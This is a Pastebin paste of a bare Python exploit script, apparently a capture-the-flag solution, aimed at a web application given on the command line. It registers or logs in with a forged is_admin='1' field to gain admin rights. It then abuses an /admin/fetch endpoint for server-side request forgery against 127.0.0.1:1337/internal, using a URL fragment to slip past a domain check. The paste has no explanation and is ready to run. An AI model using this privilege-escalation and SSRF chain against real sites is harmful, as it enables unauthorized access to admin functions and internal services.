Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- import httpx
- import argparse
- class ArgsType:
- target: str
- class CredentialType:
- username: any
- password: any
- is_admin: any
- class Exploiter:
- def __init__(self, target: str, creds: CredentialType = None):
- self.client = httpx.Client(base_url=target)
- self.creds = creds
- def register(self):
- return self.client.post("/register", data=self.creds.__dict__)
- def login(self):
- return self.client.post("/login", data=self.creds.__dict__)
- def fetch(self, url: str):
- return self.client.post(
- "/admin/fetch",
- data={"url": url},
- cookies={"session": self.client.cookies.get("session")},
- )
- def exploit(self):
- # self.register()
- self.login()
- r = self.fetch("http://127.0.0.1:1337/internal#daffainfo.com")
- print(r.text)
- @staticmethod
- def parse_args() -> ArgsType:
- parser = argparse.ArgumentParser(description="Exploit a target")
- parser.add_argument("-t", "--target", required=True, help="Target URL")
- return parser.parse_args()
- if __name__ == "__main__":
- creds = CredentialType()
- creds.username, creds.password, creds.is_admin = "rootkids", "12321", "1"
- args = Exploiter.parse_args()
- exploiter = Exploiter(args.target, creds)
- exploiter.exploit()
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement